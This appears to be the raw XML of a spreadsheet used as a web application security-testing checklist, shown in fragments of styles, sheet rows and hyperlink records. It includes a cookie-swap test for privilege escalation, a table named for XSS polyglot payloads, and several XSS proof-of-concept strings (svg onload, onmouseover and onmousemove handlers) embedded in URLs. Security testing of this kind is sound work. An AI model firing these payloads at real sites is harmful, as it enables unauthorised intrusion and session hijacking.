    <t>Login with a low privilege user. Get the session cookie and log out.  Login into high privilege user. Replace the session cookie with the low privilege user's and try to log in.
Refresh the page in low privilege user's machine and check if he is logged in as high privilege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</si>
</sst>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70C0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color rgb="FF0070C0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <i/>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8"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>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0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="0" xfId="0" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="2" borderId="0" xfId="0" applyFont="1" applyFill="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0" fontId="0" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="6" borderId="0" xfId="0" applyFont="1" applyFill="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0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="6" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="6" borderId="4" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="14" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="1" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="3" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="4" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="4" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="3" borderId="5" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="5" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="1" quotePrefix="1"/>
    <xf numFmtId="0" fontId="1" fillId="4" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="6" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
    <xf numFmtId="0" fontId="1" fillId="5" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyFont="1"/>
  </cellXfs>
  <cellStyles count="2">
    <cellStyle name="Hyperlink" xfId="1" builtinId="8"/>
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="1122">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F0"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF00B0F0"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF92D050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFFC000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFC00000"/>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fill>
        <patternFill>
          <bgColor theme="7" tint="0.79998168889431442"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor theme="0" tint="-0.14996795556505021"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FF00B050"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill>
          <bgColor rgb="FFFF0000"/>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D53C100-E4DA-45C2-8E51-5AA3DC404B57}"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FC8CAD-89D1-49E3-8165-B36C11B48D81}" name="XSS_Polyglot_Payloads__2" displayName="XSS_Polyglot_Payloads__2" ref="A2:A10" tableType="queryTable" totalsRowShown="0">
  <autoFilter ref="A2:A10" xr:uid="{1DFC8CAD-89D1-49E3-8165-B36C11B48D81}"/>
  <tableColumns count="1">
    <tableColumn id="1" xr3:uid="{9D6C3F9A-6C00-487E-8C07-9F2711544094}" uniqueName="1" name="Column1" queryTableFieldId="1" dataDxfId="11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adlinkchecker.com/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://mxtoolbox.com/DMARC.aspx" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://woohoosclptest1.qwikcilver.com/Egms_Security/QwikHomeLatest/QwikHome/Security/login?OKEY=SvaR9eANu2ClBc9RIuh1iDrI4YdaIj" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings1.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://securityheaders.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://12.179.51.51/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://woohoosclptest1.qwikcilver.com/Egms_Security/QwikHomeLatest/QwikHome/Security/login?OKEY=SvaR9eANu2ClBc9RIuh1iDrI4YdaIj" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/stevenvachon/broken-link-checker" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://woohoosclptest1.qwikcilver.com/Egms_Security/QwikHomeLatest/QwikHome/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:%22%3E%3Csvg/onload=confirm(1)%3E%22@email-domain.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kitterman.com/spf/validate.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com'-confirm(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arget.com/?parameter=%22onmousemove=alert(%22XSS%22)%22" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings2.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.target.com/%22onmouseover=%22javascript:prompt()%22" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/Intruders/XSS_Polyglots.txt" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sphinx.mythic-beasts.com/~pdw/cgi-bin/emailvalidate" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/payloadbox/xss-payload-list/blob/master/Intruder/xss-payload-list.txt"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topLeftCell="A22" workbookViewId="0">
      <selection activeCell="A33" sqref="A33"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="1" max="1" width="81.36328125" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="66.453125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="54" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="28.81640625" customWidth="1"/>
    <col min="5" max="5" width="14.54296875" customWidth="1"/>
    <col min="6" max="6" width="72.81640625" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" s="50" customFormat="1" x14ac:dyDescent="0.35">
      <c r="A1" s="50" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="2" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A2" s="22" t="s">
        <v>0</v>
      </c>
      <c r="B2" s="31"/>
    </row>
    <row r="3" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3" s="21" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="28"/>
    </row>
    <row r="4" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A4" s="21" t="s">
        <v>2</v>
      </c>
      <c r="B4" s="30"/>
    </row>
    <row r="5" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A5" s="21" t="s">
        <v>193</v>
      </c>
    </row>
    <row r="6" spans="1:6" s="51" customFormat="1" x14ac:dyDescent="0.35">
      <c r="A6" s="51" t="s">
        <v>194</v>
      </c>
    </row>
    <row r="7" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A7" s="2" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="8" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A8" s="20" t="s">
        <v>8</v>
      </c>
      <c r="B8" s="20" t="s">
        <v>50</v>
      </c>
      <c r="C8" s="20" t="s">
        <v>100</v>
      </c>
      <c r="D8" s="21" t="s">
        <v>4</v>
      </c>
      <c r="E8" s="21" t="s">
        <v>24</v>
      </c>
      <c r="F8" s="23" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="9" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A9" s="4" t="s">
        <v>9</v>
      </c>
      <c r="B9" s="8" t="s">
        <v>49</v>
      </c>
      <c r="C9" s="29"/>
      <c r="D9" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E9" s="7" t="s">
        <v>181</v>
      </c>
      <c r="F9" s="33" t="s">
        <v>195</v>
      </c>
    </row>
    <row r="10" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A10" s="4" t="s">
        <v>85</v>
      </c>
      <c r="B10" s="18" t="s">
        <v>141</v>
      </c>
      <c r="C10" s="29"/>
      <c r="D10" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E10" s="7" t="s">
        <v>181</v>
      </c>
      <c r="F10" s="33" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="11" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A11" s="2" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="12" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A12" s="20" t="s">
        <v>8</v>
      </c>
      <c r="B12" s="20" t="s">
        <v>50</v>
      </c>
      <c r="C12" s="20" t="s">
        <v>100</v>
      </c>
      <c r="D12" s="20" t="s">
        <v>4</v>
      </c>
      <c r="E12" s="26" t="s">
        <v>24</v>
      </c>
      <c r="F12" s="23" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A13" s="4" t="s">
        <v>64</v>
      </c>
      <c r="B13" s="8" t="s">
        <v>49</v>
      </c>
      <c r="C13" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D13" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E13" s="7" t="s">
        <v>87</v>
      </c>
      <c r="F13" s="28" t="s">
        <v>180</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="58" x14ac:dyDescent="0.35">
      <c r="A14" s="7" t="s">
        <v>12</v>
      </c>
      <c r="B14" s="17" t="s">
        <v>162</v>
      </c>
      <c r="C14" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D14" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E14" s="7" t="s">
        <v>87</v>
      </c>
      <c r="F14" s="17" t="s">
        <v>179</v>
      </c>
    </row>
    <row r="15" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A15" s="7" t="s">
        <v>65</v>
      </c>
      <c r="B15" s="4" t="s">
        <v>84</v>
      </c>
      <c r="C15" s="4"/>
      <c r="D15" s="4" t="s">
        <v>23</v>
      </c>
      <c r="E15" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F15" s="4" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="16" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A16" s="6"/>
      <c r="B16" s="16"/>
      <c r="C16" s="16"/>
      <c r="D16" s="16"/>
      <c r="E16" s="6"/>
    </row>
    <row r="17" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A17" s="14" t="s">
        <v>90</v>
      </c>
    </row>
    <row r="18" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A18" s="21" t="s">
        <v>8</v>
      </c>
      <c r="B18" s="21" t="s">
        <v>50</v>
      </c>
      <c r="C18" s="20" t="s">
        <v>100</v>
      </c>
      <c r="D18" s="21" t="s">
        <v>4</v>
      </c>
      <c r="E18" s="21" t="s">
        <v>24</v>
      </c>
      <c r="F18" s="23" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="19" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A19" s="9" t="s">
        <v>91</v>
      </c>
      <c r="B19" s="8" t="s">
        <v>92</v>
      </c>
      <c r="C19" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D19" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E19" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F19" s="17" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="20" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A20" s="27" t="s">
        <v>93</v>
      </c>
      <c r="B20" s="4" t="s">
        <v>94</v>
      </c>
      <c r="C20" s="1"/>
      <c r="D20" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E20" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F20" s="17" t="s">
        <v>143</v>
      </c>
    </row>
    <row r="21" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A21" s="27" t="s">
        <v>95</v>
      </c>
      <c r="B21" s="4" t="s">
        <v>120</v>
      </c>
      <c r="C21" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D21" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E21" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F21" s="17" t="s">
        <v>136</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="13.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A22" s="27" t="s">
        <v>96</v>
      </c>
      <c r="B22" s="18" t="s">
        <v>97</v>
      </c>
      <c r="C22" s="4" t="s">
        <v>182</v>
      </c>
      <c r="D22" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E22" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F22" s="17"/>
    </row>
    <row r="23" spans="1:6" ht="13.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A23" s="27" t="s">
        <v>98</v>
      </c>
      <c r="B23" s="18" t="s">
        <v>99</v>
      </c>
      <c r="C23" s="4" t="s">
        <v>183</v>
      </c>
      <c r="D23" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E23" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F23" s="17"/>
    </row>
    <row r="24" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A24" s="6" t="s">
        <v>121</v>
      </c>
      <c r="B24" s="18" t="s">
        <v>101</v>
      </c>
      <c r="C24" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D24" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E24" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F24" s="17" t="s">
        <v>144</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="13.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A25" s="6" t="s">
        <v>102</v>
      </c>
      <c r="B25" s="18" t="s">
        <v>84</v>
      </c>
      <c r="C25" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D25" s="4" t="s">
        <v>23</v>
      </c>
      <c r="E25" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F25" s="17" t="s">
        <v>178</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="13.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A26" s="6" t="s">
        <v>103</v>
      </c>
      <c r="B26" s="18" t="s">
        <v>84</v>
      </c>
      <c r="C26" s="4"/>
      <c r="D26" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E26" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F26" s="17" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="13.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A27" s="6" t="s">
        <v>110</v>
      </c>
      <c r="B27" s="34" t="s">
        <v>84</v>
      </c>
      <c r="C27" s="35"/>
      <c r="D27" s="35" t="s">
        <v>10</v>
      </c>
      <c r="E27" s="36" t="s">
        <v>25</v>
      </c>
      <c r="F27" s="37" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="28" spans="1:6" ht="13.5" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A28" s="7" t="s">
        <v>127</v>
      </c>
      <c r="B28" s="18" t="s">
        <v>84</v>
      </c>
      <c r="C28" s="28"/>
      <c r="D28" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E28" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F28" s="4" t="s">
        <v>133</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A29" s="7" t="s">
        <v>134</v>
      </c>
      <c r="B29" s="18" t="s">
        <v>84</v>
      </c>
      <c r="C29" s="28"/>
      <c r="D29" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E29" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F29" s="17" t="s">
        <v>135</v>
      </c>
    </row>
    <row r="30" spans="1:6" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A30" s="7" t="s">
        <v>175</v>
      </c>
      <c r="B30" s="18" t="s">
        <v>282</v>
      </c>
      <c r="C30" s="28" t="s">
        <v>132</v>
      </c>
      <c r="D30" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E30" s="7" t="s">
        <v>87</v>
      </c>
      <c r="F30" s="28" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="31" spans="1:6" ht="29" x14ac:dyDescent="0.35">
      <c r="A31" s="7" t="s">
        <v>138</v>
      </c>
      <c r="B31" s="18" t="s">
        <v>84</v>
      </c>
      <c r="C31" s="28" t="s">
        <v>139</v>
      </c>
      <c r="D31" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E31" s="7" t="s">
        <v>87</v>
      </c>
      <c r="F31" s="17" t="s">
        <v>140</v>
      </c>
    </row>
    <row r="32" spans="1:6" ht="72.5" x14ac:dyDescent="0.35">
      <c r="A32" s="7" t="s">
        <v>284</v>
      </c>
      <c r="B32" s="18"/>
      <c r="C32" s="28"/>
      <c r="D32" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E32" s="7" t="s">
        <v>87</v>
      </c>
      <c r="F32" s="17" t="s">
        <v>285</v>
      </c>
    </row>
    <row r="33" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A33" s="7" t="s">
        <v>283</v>
      </c>
      <c r="B33" s="18"/>
      <c r="C33" s="28"/>
      <c r="D33" s="4" t="s">
        <v>22</v>
      </c>
      <c r="E33" s="7" t="s">
        <v>87</v>
      </c>
      <c r="F33" s="1"/>
    </row>
    <row r="34" spans="1:6" ht="13" customHeight="1" x14ac:dyDescent="0.35">
      <c r="A34" s="38" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="35" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A35" s="21" t="s">
        <v>8</v>
      </c>
      <c r="B35" s="21" t="s">
        <v>114</v>
      </c>
      <c r="C35" s="20" t="s">
        <v>100</v>
      </c>
      <c r="D35" s="21" t="s">
        <v>4</v>
      </c>
      <c r="E35" s="21" t="s">
        <v>24</v>
      </c>
      <c r="F35" s="23" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="36" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A36" s="4" t="s">
        <v>86</v>
      </c>
      <c r="B36" s="4" t="s">
        <v>84</v>
      </c>
      <c r="C36" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D36" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E36" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F36" s="4" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="37" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A37" s="7" t="s">
        <v>14</v>
      </c>
      <c r="B37" s="4" t="s">
        <v>177</v>
      </c>
      <c r="C37" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D37" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E37" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F37" s="4" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="38" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A38" s="7"/>
      <c r="B38" s="1"/>
      <c r="C38" s="1"/>
      <c r="D38" s="4"/>
      <c r="E38" s="24"/>
    </row>
    <row r="39" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A39" s="10" t="s">
        <v>17</v>
      </c>
      <c r="B39" s="52" t="s">
        <v>26</v>
      </c>
      <c r="C39" s="52"/>
      <c r="D39" s="52"/>
      <c r="E39" s="52"/>
    </row>
    <row r="40" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A40" s="20" t="s">
        <v>8</v>
      </c>
      <c r="B40" s="20" t="s">
        <v>50</v>
      </c>
      <c r="C40" s="20" t="s">
        <v>100</v>
      </c>
      <c r="D40" s="20" t="s">
        <v>4</v>
      </c>
      <c r="E40" s="25" t="s">
        <v>24</v>
      </c>
      <c r="F40" s="23" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="41" spans="1:6" ht="87" x14ac:dyDescent="0.35">
      <c r="A41" s="4" t="s">
        <v>32</v>
      </c>
      <c r="B41" s="11" t="s">
        <v>163</v>
      </c>
      <c r="C41" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D41" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E41" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F41" s="17" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="42" spans="1:6" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A42" s="6" t="s">
        <v>212</v>
      </c>
      <c r="C42" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D42" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E42" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F42" s="17" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="43" spans="1:6" ht="43.5" x14ac:dyDescent="0.35">
      <c r="A43" s="6" t="s">
        <v>213</v>
      </c>
      <c r="B43" t="s">
        <v>214</v>
      </c>
      <c r="C43" s="4" t="s">
        <v>25</v>
      </c>
      <c r="D43" s="4" t="s">
        <v>21</v>
      </c>
      <c r="E43" s="7" t="s">
        <v>25</v>
      </c>
      <c r="F43" s="17" t="s">
        <v>146</v>
      </c>
    </row>
    <row r="44" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A44" s="6" t="s">
        <v>215</v>
      </c>
      <c r="B44" s="46" t="s">
        <v>216</v>
      </c>
      <c r="C44" s="16"/>
      <c r="D44" s="16"/>
      <c r="E44" s="6"/>
      <c r="F44" s="43"/>
    </row>
    <row r="45" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A45" s="6" t="s">
        <v>217</v>
      </c>
      <c r="B45" s="46" t="s">
        <v>218</v>
      </c>
      <c r="C45" s="16"/>
      <c r="D45" s="16"/>
      <c r="E45" s="6"/>
      <c r="F45" s="43"/>
    </row>
    <row r="46" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A46" s="6" t="s">
        <v>247</v>
      </c>
      <c r="B46" s="46"/>
      <c r="C46" s="16"/>
      <c r="D46" s="16"/>
      <c r="E46" s="6"/>
      <c r="F46" s="43"/>
    </row>
    <row r="47" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A47" s="6" t="s">
        <v>258</v>
      </c>
      <c r="B47" s="49" t="s">
        <v>248</v>
      </c>
      <c r="C47" s="16"/>
      <c r="D47" s="16"/>
      <c r="E47" s="6"/>
      <c r="F47" s="43"/>
    </row>
    <row r="48" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A48" s="6" t="s">
